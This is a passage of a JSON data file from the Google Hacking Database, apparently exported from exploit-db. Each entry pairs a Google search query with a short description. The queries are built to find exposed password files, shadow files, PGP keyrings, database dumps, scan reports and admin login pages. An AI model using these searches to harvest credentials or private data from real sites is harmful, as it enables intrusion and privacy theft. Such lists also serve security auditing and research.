        "link": "https://www.exploit-db.com/ghdb/109/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Test+Page+for+Apache%22+%22It+Worked%21%22+%22on+this+web%22", 
        "shortDescription": "intitle:\"Test Page for Apache\" \"It Worked!\" \"on this web\"", 
        "textualDescription": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."
    }, 
    {
        "signatureReferenceNumber": "110", 
        "link": "https://www.exploit-db.com/ghdb/110/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Can%27t+connect+to+local%22+intitle%3Awarning", 
        "shortDescription": "\"Can't connect to local\" intitle:warning", 
        "textualDescription": "Another SQL error message, this message can display database name, path names and partial SQL code, all of which are very helpful for hackers..."
    }, 
    {
        "signatureReferenceNumber": "111", 
        "link": "https://www.exploit-db.com/ghdb/111/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+dead.letter", 
        "shortDescription": "intitle:index.of dead.letter", 
        "textualDescription": "dead.letter contains the contents of unfinished emails created on the UNIX platform. Emails (finished or not) can contain sensitive information."
    }, 
    {
        "signatureReferenceNumber": "112", 
        "link": "https://www.exploit-db.com/ghdb/112/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+ws_ftp.ini", 
        "shortDescription": "intitle:index.of ws_ftp.ini", 
        "textualDescription": "ws_ftp.ini is a configuration file for a popular FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. These should not be on the web!"
    }, 
    {
        "signatureReferenceNumber": "113", 
        "link": "https://www.exploit-db.com/ghdb/113/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+administrators.pwd", 
        "shortDescription": "intitle:index.of administrators.pwd", 
        "textualDescription": "This file contains administrative user names and (weakly) encrypted password for Microsoft Front Page. The file should not be readble to the general public."
    }, 
    {
        "signatureReferenceNumber": "114", 
        "link": "https://www.exploit-db.com/ghdb/114/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=inurl:secring+ext:skr+%7C+ext:pgp+%7C+ext:bak", 
        "shortDescription": "inurl:secring ext:skr | ext:pgp | ext:bak", 
        "textualDescription": "This file is the secret keyring for PGP encryption. Armed with this file (and perhaps a passphrase), a malicious user can read all your encrypted files! This should not be posted on the web!"
    }, 
    {
        "signatureReferenceNumber": "115", 
        "link": "https://www.exploit-db.com/ghdb/115/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3AIndex.of+etc+shadow", 
        "shortDescription": "intitle:Index.of etc shadow", 
        "textualDescription": "This file contains usernames and (lame) encrypted passwords! Armed with this file and a decent password cracker, an attacker can crack passwords and log into a UNIX system."
    }, 
    {
        "signatureReferenceNumber": "116", 
        "link": "https://www.exploit-db.com/ghdb/116/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Amanyservers.htm", 
        "shortDescription": "inurl:ManyServers.htm", 
        "textualDescription": "Microsoft Terminal Services Multiple Clients pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely."
    }, 
    {
        "signatureReferenceNumber": "117", 
        "link": "https://www.exploit-db.com/ghdb/117/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Terminal+Services+Web+Connection%22", 
        "shortDescription": "intitle:\"Terminal Services Web Connection\"", 
        "textualDescription": "Microsoft Terminal Services Web Connector pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to a \"protected\" machine."
    }, 
    {
        "signatureReferenceNumber": "118", 
        "link": "https://www.exploit-db.com/ghdb/118/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Remote+Desktop+Web+Connection%22", 
        "shortDescription": "intitle:\"Remote Desktop Web Connection\"", 
        "textualDescription": "Microsoft Remote Desktop Connection Web Connection pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to an otherwise inaccessible machine."
    }, 
    {
        "signatureReferenceNumber": "119", 
        "link": "https://www.exploit-db.com/ghdb/119/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Welcome+to+Intranet%22", 
        "shortDescription": "\"Welcome to Intranet\"", 
        "textualDescription": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information."
    }, 
    {
        "signatureReferenceNumber": "120", 
        "link": "https://www.exploit-db.com/ghdb/120/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Asearch.php+vbulletin", 
        "shortDescription": "inurl:search.php vbulletin", 
        "textualDescription": "Version 3.0.0 candidate 4 and earlier of Vbulletin may have a cross-site scripting vulnerability. See http://www.securityfocus.com/bid/9656 for more info."
    }, 
    {
        "signatureReferenceNumber": "121", 
        "link": "https://www.exploit-db.com/ghdb/121/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Afooter.inc.php", 
        "shortDescription": "inurl:footer.inc.php", 
        "textualDescription": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server."
    }, 
    {
        "signatureReferenceNumber": "122", 
        "link": "https://www.exploit-db.com/ghdb/122/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Ainfo.inc.php", 
        "shortDescription": "inurl:info.inc.php", 
        "textualDescription": "From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server."
    }, 
    {
        "signatureReferenceNumber": "123", 
        "link": "https://www.exploit-db.com/ghdb/123/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+intitle%3Alogin", 
        "shortDescription": "inurl:admin intitle:login", 
        "textualDescription": "This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information."
    }, 
    {
        "signatureReferenceNumber": "124", 
        "link": "https://www.exploit-db.com/ghdb/124/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aadmin+intitle%3Alogin", 
        "shortDescription": "intitle:admin intitle:login", 
        "textualDescription": "This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information."
    }, 
    {
        "signatureReferenceNumber": "125", 
        "link": "https://www.exploit-db.com/ghdb/125/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=filetype:asp+%22Custom+Error+Message%22+Category+Source&ie=UTF-8&oe=UTF-8", 
        "shortDescription": "filetype:asp \"Custom Error Message\" Category Source", 
        "textualDescription": "This is an ASP error message that can reveal information such as compiler used, language used, line numbers, program names and partial source code."
    }, 
    {
        "signatureReferenceNumber": "126", 
        "link": "https://www.exploit-db.com/ghdb/126/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=%22Fatal+error:+Call+to+undefined+function%22+-reply+-the+-next&hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&start=10&sa=N", 
        "shortDescription": "\"Fatal error: Call to undefined function\" -reply -the -next", 
        "textualDescription": "This error message can reveal information such as compiler used, language used, line numbers, program names and partial source code."
    }, 
    {
        "signatureReferenceNumber": "127", 
        "link": "https://www.exploit-db.com/ghdb/127/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+filetype%3Axls&btnG=Google+Search", 
        "shortDescription": "inurl:admin filetype:xls", 
        "textualDescription": "This search can find Excel spreadsheets in an administrative directory or of an administrative nature. Many times these documents contain sensitive information."
    }, 
    {
        "signatureReferenceNumber": "128", 
        "link": "https://www.exploit-db.com/ghdb/128/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+inurl%3Auserlist&btnG=Google+Search", 
        "shortDescription": "inurl:admin inurl:userlist", 
        "textualDescription": "This search reveals userlists of administrative importance. Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords."
    }, 
    {
        "signatureReferenceNumber": "129", 
        "link": "https://www.exploit-db.com/ghdb/129/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+filetype%3Aasp+inurl%3Auserlist&btnG=Google+Search", 
        "shortDescription": "inurl:admin filetype:asp inurl:userlist", 
        "textualDescription": "This search reveals userlists of administrative importance. Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords."
    }, 
    {
        "signatureReferenceNumber": "130", 
        "link": "https://www.exploit-db.com/ghdb/130/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Abackup+intitle%3Aindex.of+inurl%3Aadmin&btnG=Google+Search", 
        "shortDescription": "inurl:backup intitle:index.of inurl:admin", 
        "textualDescription": "This query reveals backup directories. These directories can contain various information ranging from source code, sql tables, userlists, and even passwords."
    }, 
    {
        "signatureReferenceNumber": "131", 
        "link": "https://www.exploit-db.com/ghdb/131/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?q=%22Welcome+to+PHP-Nuke%22+congratulations&ie=UTF-8&oe=UTF-8", 
        "shortDescription": "\"Welcome to PHP-Nuke\" congratulations", 
        "textualDescription": "This finds default installations of the postnuke CMS system. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps."
    }, 
    {
        "signatureReferenceNumber": "132", 
        "link": "https://www.exploit-db.com/ghdb/132/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=allintitle:Netscape+FastTrack+Server+Home+Page&ie=UTF-8&oe=UTF-8", 
        "shortDescription": "allintitle:Netscape FastTrack Server Home Page", 
        "textualDescription": "This finds default installations of Netscape Fasttrack Server. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps."
    }, 
    {
        "signatureReferenceNumber": "133", 
        "link": "https://www.exploit-db.com/ghdb/133/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.de/search?q=%22Welcome+to+phpMyAdmin%22+AND+%22+Create+new+database%22&btnG=Google+Suche&meta=", 
        "shortDescription": "\"Welcome to phpMyAdmin\" \" Create new database\"", 
        "textualDescription": "phpMyAdmin is a widly spread webfrontend used to mantain sql databases. The default security mechanism is to leave it up to the admin of the website to put a .htaccess file in the directory of the application. Well gues what, obviously  some admins are either too lazy or don't know how to secure their directories.  These pages should obviously not be accessable to the public without some kind of password ;-)"
    }, 
    {
        "signatureReferenceNumber": "134", 
        "link": "https://www.exploit-db.com/ghdb/134/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of+c%3A%5CWindows%22", 
        "shortDescription": "intitle:\"Index of c:\\Windows\"", 
        "textualDescription": "These pages indicate that they are sharing the C:\\WINDOWS directory, which is the system folder for many Windows installations."
    }, 
    {
        "signatureReferenceNumber": "135", 
        "link": "https://www.exploit-db.com/ghdb/135/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=warning+%22error+on+line%22+php+sablotron", 
        "shortDescription": "warning \"error on line\" php sablotron", 
        "textualDescription": "sablotron is an XML toolit thingie. This query hones in on error messages generated by this toolkit. These error messages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc."
    }, 
    {
        "signatureReferenceNumber": "136", 
        "link": "https://www.exploit-db.com/ghdb/136/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Most+Submitted+Forms+and+Scripts%22+%22this+section%22", 
        "shortDescription": "\"Most Submitted Forms and Scripts\" \"this section\"", 
        "textualDescription": "More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots of good stuff.These are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly..."
    }, 
    {
        "signatureReferenceNumber": "137", 
        "link": "https://www.exploit-db.com/ghdb/137/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Achangepassword.asp&btnG=Google+Search", 
        "shortDescription": "inurl:changepassword.asp", 
        "textualDescription": "This is a common script for changing passwords. Now, this doesn't actually reveal the password, but it provides great information about the security layout of a server. These links can be used to troll around a website."
    }, 
    {
        "signatureReferenceNumber": "138", 
        "link": "https://www.exploit-db.com/ghdb/138/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Select+a+database+to+view%22+intitle%3A%22filemaker+pro%22", 
        "shortDescription": "\"Select a database to view\" intitle:\"filemaker pro\"", 
        "textualDescription": "An oldie but a goodie. This search locates servers which provides access to Filemaker pro databases via the web. The severity of this search varies wildly depending on the security of the database itself. Regardless, if Google can crawl it, it's potentially using cleartext authentication."
    }, 
    {
        "signatureReferenceNumber": "139", 
        "link": "https://www.exploit-db.com/ghdb/139/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22not+for+distribution%22+confidential", 
        "shortDescription": "\"not for distribution\" confidential", 
        "textualDescription": "The terms \"not for distribution\" and confidential indicate a sensitive document. Results vary wildly, but web-based documents are for public viewing, and should neither be considered confidential or private."
    }, 
    {
        "signatureReferenceNumber": "140", 
        "link": "https://www.exploit-db.com/ghdb/140/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Thank+you+for+your+order%22+%2Breceipt", 
        "shortDescription": "\"Thank you for your order\" +receipt", 
        "textualDescription": "After placing an order via the web, many sites provide a page containing the phrase \"Thank you for your order\" and provide a receipt for future reference. At the very least, these pages can provide insight into the structure of a web-based shop."
    }, 
    {
        "signatureReferenceNumber": "141", 
        "link": "https://www.exploit-db.com/ghdb/141/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=allinurl%3Aintranet+admin", 
        "shortDescription": "allinurl:intranet admin", 
        "textualDescription": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information. Some of these pages are simply portals to an Intranet site, which helps with information gathering."
    }, 
    {
        "signatureReferenceNumber": "142", 
        "link": "https://www.exploit-db.com/ghdb/142/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?q=%0Aintitle%3A%22Nessus+Scan+Report%22+%22This+file+was+generated+by+Nessus%22+", 
        "shortDescription": "intitle:\"Nessus Scan Report\" \"This file was generated by Nessus\"", 
        "textualDescription": "This search yeids nessus scan reports. Even if some of the vulnerabilities have been fixed, we can still gather valuable information about the network/hosts. This also works with ISS and any other vulnerability scanner which produces reports in html or text format."
    }, 
    {
        "signatureReferenceNumber": "143", 
        "link": "https://www.exploit-db.com/ghdb/143/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=intitle%3A%22index.of.personal%22&btnG=Google+Search", 
        "shortDescription": "intitle:\"index.of.personal\"", 
        "textualDescription": "This directory has various personal documents and pictures."
    }, 
    {
        "signatureReferenceNumber": "144", 
        "link": "https://www.exploit-db.com/ghdb/144/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22This+report+lists%22+%22identified+by+Internet+Scanner%22", 
        "shortDescription": "\"This report lists\" \"identified by Internet Scanner\"", 
        "textualDescription": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."
    }, 
    {
        "signatureReferenceNumber": "145", 
        "link": "https://www.exploit-db.com/ghdb/145/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Network+Host+Assessment+Report%22+%22Internet+Scanner%22", 
        "shortDescription": "\"Network Host Assessment Report\" \"Internet Scanner\"", 
        "textualDescription": "This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."
    }, 
    {
        "signatureReferenceNumber": "146", 
        "link": "https://www.exploit-db.com/ghdb/146/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Network+Vulnerability+Assessment+Report%22", 
        "shortDescription": "\"Network Vulnerability Assessment Report\"", 
        "textualDescription": "This search yeids vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."
    }, 
    {
        "signatureReferenceNumber": "147", 
        "link": "https://www.exploit-db.com/ghdb/147/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Host+Vulnerability+Summary+Report%22+", 
        "shortDescription": "\"Host Vulnerability Summary Report\"", 
        "textualDescription": "This search yeids host vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned."
    }, 
    {
        "signatureReferenceNumber": "148", 
        "link": "https://www.exploit-db.com/ghdb/148/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+inbox", 
        "shortDescription": "intitle:index.of inbox", 
        "textualDescription": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data."
    }, 
    {
        "signatureReferenceNumber": "149", 
        "link": "https://www.exploit-db.com/ghdb/149/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+inbox+dbx", 
        "shortDescription": "intitle:index.of inbox dbx", 
        "textualDescription": "This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data."
    }, 
    {
        "signatureReferenceNumber": "150", 
        "link": "https://www.exploit-db.com/ghdb/150/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+inbox+dbx", 
        "shortDescription": "intitle:index.of cleanup.log", 
        "textualDescription": "This search reveals potential location for mailbox files by keying on the Outlook Express cleanup.log file. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data."
    }, 
    {
        "signatureReferenceNumber": "151", 
        "link": "https://www.exploit-db.com/ghdb/151/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22%23mysql+dump%22+filetype%3Asql&btnG=Search", 
        "shortDescription": "\"#mysql dump\" filetype:sql", 
        "textualDescription": "This reveals mySQL database dumps. These database dumps list the structure and content of databases, which can reveal many different types of sensitive information."
    }, 
    {
        "signatureReferenceNumber": "152", 
        "link": "https://www.exploit-db.com/ghdb/152/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.co.uk/search?q=allinurl:install/install.php&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N", 
        "shortDescription": "allinurl:install/install.php", 
        "textualDescription": "Pages with install/install.php files may be in the process of installing a new service or program. These servers may be insecure due to insecure default settings. In some cases, these servers may allow for a new installation of a program or service with insecure settings. In other cases, snapshot data about an install process can be gleaned from cached page images."
    }, 
    {
        "signatureReferenceNumber": "153", 
        "link": "https://www.exploit-db.com/ghdb/153/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Avbstats%2Ephp+%22page+generated%22", 
        "shortDescription": "inurl:vbstats.php \"page generated\"", 
        "textualDescription": "This is your typical stats page listing referrers and top ips and such. This information can certainly be used to gather information about a site and its visitors."
    }, 
    {
        "signatureReferenceNumber": "154", 
        "link": "https://www.exploit-db.com/ghdb/154/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22index+of%22+%2F+lck", 
        "shortDescription": "\"index of\" / lck", 
        "textualDescription": "These lock files often contain usernames of the user that has locked the file. Username harvesting can be done using this technique."
    }, 
    {
        "signatureReferenceNumber": "155", 
        "link": "https://www.exploit-db.com/ghdb/155/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Index+of%22+%2F+%22chat%2Flogs%22+", 
        "shortDescription": "\"Index of\" / \"chat/logs\"", 
        "textualDescription": "This search reveals chat logs. Depending on the contents of the logs, these files could contain just about anything!"
    }, 
    {
        "signatureReferenceNumber": "156", 
        "link": "https://www.exploit-db.com/ghdb/156/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=index%2Eof+perform%2Eini", 
        "shortDescription": "index.of perform.ini", 
        "textualDescription": "This file contains information about the mIRC client and may include channel and user names."
    }, 
    {
        "signatureReferenceNumber": "157", 
        "link": "https://www.exploit-db.com/ghdb/157/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22SnortSnarf+alert+page%22", 
        "shortDescription": "\"SnortSnarf alert page\"", 
        "textualDescription": "snort is an intrusion detection system. SnorfSnarf creates pretty web pages from intrusion detection data. These pages show what the bad guys are doing to a system. Generally, it's a bad idea to show the bad guys what you've noticed."
    }, 
    {
        "signatureReferenceNumber": "158", 
        "link": "https://www.exploit-db.com/ghdb/158/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=inurl:%22newsletter/admin/%22+intitle:%22newsletter+admin%22&hl=en", 
        "shortDescription": "inurl:\"newsletter/admin/\" intitle:\"newsletter admin\"", 
        "textualDescription": "These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list."
    }, 
    {
        "signatureReferenceNumber": "159", 
        "link": "https://www.exploit-db.com/ghdb/159/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=inurl:%22newsletter/admin/%22+intitle:%22newsletter+admin%22", 
        "shortDescription": "inurl:\"newsletter/admin/\"", 
        "textualDescription": "These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list. This is a less acurate search than the similar intitle:\"newsletter admin\" search."
    }, 
    {
        "signatureReferenceNumber": "160", 
        "link": "https://www.exploit-db.com/ghdb/160/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3AphpSysInfo%2F+%22created+by+phpsysinfo%22", 
        "shortDescription": "inurl:phpSysInfo/ \"created by phpsysinfo\"", 
        "textualDescription": "This statistics program allows the an admin to view stats about a webserver. Some sites leave this in a publically accessible web page. Hackers could have access to data such as the real IP address of the server, server memory usage, general system info such as  OS, type of chip, hard-drive makers and much more."
    }, 
    {
        "signatureReferenceNumber": "161", 
        "link": "https://www.exploit-db.com/ghdb/161/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=allinurl%3A+admin+mdb+", 
        "shortDescription": "allinurl: admin mdb", 
        "textualDescription": "Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!"
    }, 
    {
        "signatureReferenceNumber": "162", 
        "link": "https://www.exploit-db.com/ghdb/162/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=allinurl%3A%22exchange%2Flogon.asp%22", 
        "shortDescription": "allinurl:\"exchange/logon.asp\"", 
        "textualDescription": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. \" Now, consider for a moment and you will understand why this could be potentially bad."
    }, 
    {
        "signatureReferenceNumber": "163", 
        "link": "https://www.exploit-db.com/ghdb/163/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of%22+cfide", 
        "shortDescription": "intitle:\"Index of\" cfide", 
        "textualDescription": "This is the top level directory of ColdFusion, a powerful web development environment. This directory most likely contains sensitive information about a ColdFusion developed site."
    }, 
    {
        "signatureReferenceNumber": "164", 
        "link": "https://www.exploit-db.com/ghdb/164/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22ColdFusion+Administrator+Login%22", 
        "shortDescription": "intitle:\"ColdFusion Administrator Login\"", 
        "textualDescription": "This is the default login page for ColdFusion administration. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server."
    }, 
    {
        "signatureReferenceNumber": "165", 
        "link": "https://www.exploit-db.com/ghdb/165/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Error+Occurred%22+%22The+error+occurred+in%22+filetype%3Acfm", 
        "shortDescription": "intitle:\"Error Occurred\" \"The error occurred in\" filetype:cfm", 
        "textualDescription": "This is a typical error message from ColdFusion. A good amount of information is available from an error message like this including lines of source code, full pathnames, SQL query info, database name, SQL state info and local time info."
    }, 
    {
        "signatureReferenceNumber": "166", 
        "link": "https://www.exploit-db.com/ghdb/166/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Alogin%2Ecfm", 
        "shortDescription": "inurl:login.cfm", 
        "textualDescription": "This is the default login page for ColdFusion. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server."
    }, 
    {
        "signatureReferenceNumber": "167", 
        "link": "https://www.exploit-db.com/ghdb/167/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Acfm+%22cfapplication+name%22+password", 
        "shortDescription": "filetype:cfm \"cfapplication name\" password", 
        "textualDescription": "These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live sourcecode with usernames, database names or passwords in plaintext."
    }, 
    {
        "signatureReferenceNumber": "168", 
        "link": "https://www.exploit-db.com/ghdb/168/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3A%22%3A10000%22+intext%3Awebmin", 
        "shortDescription": "inurl:\":10000\" intext:webmin", 
        "textualDescription": "Webmin is a html admin interface for Unix boxes. It is run on a proprietary web server listening on the default port of 10000."
    }, 
    {
        "signatureReferenceNumber": "169", 
        "link": "https://www.exploit-db.com/ghdb/169/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=allinurl%3A%2Fexamples%2Fjsp%2Fsnp%2Fsnoop%2Ejsp", 
        "shortDescription": "allinurl:/examples/jsp/snp/snoop.jsp", 
        "textualDescription": "These pages reveal information about the server including path information, port information, etc."
    }, 
    {
        "signatureReferenceNumber": "170", 
        "link": "https://www.exploit-db.com/ghdb/170/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=allinurl%3Aservlet%2FSnoopServlet", 
        "shortDescription": "allinurl:servlet/SnoopServlet", 
